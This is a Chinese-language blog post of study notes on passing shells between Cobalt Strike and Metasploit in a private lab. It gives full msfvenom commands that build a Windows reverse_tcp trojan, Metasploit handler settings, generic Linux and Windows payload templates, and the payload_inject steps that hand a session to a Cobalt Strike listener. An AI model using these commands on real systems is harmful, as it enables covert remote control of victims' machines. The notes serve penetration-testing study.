CobaltStrike系列学习笔记——(三)与metasploit互相派生shell

CobaltStrike系列学习笔记——(三)与metasploit互相派生shell

实验环境 系统 IP地址
CobaltStrike(服务器/客户端) kali 192.168.134.130
靶机 win7 192.168.134.135
MSF kali 192.168.134.138
Cobalt strike派生shell给MSF

前提条件:已经获得一个CobaltStrike shell。(关于Cobalt strike shell如何获得这里不再赘述,可参考第一节的内容)
首先在metasploit处创建一个handler:

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.134.138
set lport 7777
exploit

CobaltStrike系列学习笔记——(三)与metasploit互相派生shell_第1张图片
在Listeners下点击Add新建一个New Listener,按照下图填写,点击Save保存设置。

payload选择windows/foreign/reverse_tcp
host设置为msf的host
port设置为创建msf的handler时的port

CobaltStrike系列学习笔记——(三)与metasploit互相派生shell_第2张图片
选中session,右键->Spawn。
CobaltStrike系列学习笔记——(三)与metasploit互相派生shell_第3张图片
选择msf这个listenner,点击Choose。
CobaltStrike系列学习笔记——(三)与metasploit互相派生shell_第4张图片
再来看看msf这边,已经收到了派生过来的shell。
CobaltStrike系列学习笔记——(三)与metasploit互相派生shell_第5张图片
尝试执行命令试试:
CobaltStrike系列学习笔记——(三)与metasploit互相派生shell_第6张图片

MSF派生shell给Cobalt strike

使用下列命令生成一个Windows下反弹shell木马:

msfvenom -p  windows/meterpreter/reverse_tcp lhost=192.168.134.138 lport=4444  -f exe -o  shell.exe

这里介绍一下Meterpreter中常用的反弹类型:
1.reverse_tcp
这是一个基于TCP的反向链接反弹shell, 使用起来很稳定。
(1)Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f elf -o 要生成的文件名
(2)Windows:
msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe -o 要生成的文件名
2.reverse_http
基于http方式的反向连接,在网速慢的情况下不稳定。
3.reverse_https
基于https方式的反向连接,在网速慢的情况下不稳定, https如果反弹没有收到数据,可以将监听端口换成443试试。
4.bind_tcp
这是一个基于TCP的正向连接shell,因为在内网跨网段时无法连接到attack的机器,所以在内网中经常会使用,不需要设置LHOST。
引自:https://www.cnblogs.com/backlion/p/9484949.html

如图我们可以看见目录下已经成功生成木马文件shell.exe:
CobaltStrike系列学习笔记——(三)与metasploit互相派生shell_第7张图片
使用模块handler,设置payload(注意:这里设置的payload要和我们生成木马所使用的payload一样),地址和端口,我们就开始监听了:

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.134.138
set lport 4444
exploit 

CobaltStrike系列学习笔记——(三)与metasploit互相派生shell_第8张图片
把shell.exe拷贝到靶机上,使用cmd命令行运行木马:
CobaltStrike系列学习笔记——(三)与metasploit互相派生shell_第9张图片
回到MSF上,可以发现成功反弹回shell了,执行命令成功:
CobaltStrike系列学习笔记——(三)与metasploit互相派生shell_第10张图片
在cobaltstrike上创建一个新的Listeners,用于接收msf派生的shell:在Listeners下点击Add新建一个New Listener,按照下图填写,点击Save保存设置。
CobaltStrike系列学习笔记——(三)与metasploit互相派生shell_第11张图片
回到msf,将当前session切换到后台,然后使用下图的模块,功能是注入一个新的payload 到当前的session里面,同样需要设置payload(注意:这里设置的payload要和我们cs上创建的listener对应),地址和端口,并且还要选择选择session:

use exploit/windows/local/payload_inject 
set payload windows/meterpreter/reverse_http
set lhost 192.168.134.130
set lport 6666
set session 1
exploit 

CobaltStrike系列学习笔记——(三)与metasploit互相派生shell_第12张图片
再看看cobalt strike,此时在cobalt strike上已经拿到了metasploit派生的shell:
CobaltStrike系列学习笔记——(三)与metasploit互相派生shell_第13张图片

你可能感兴趣的:(Cobalt,Strike系列)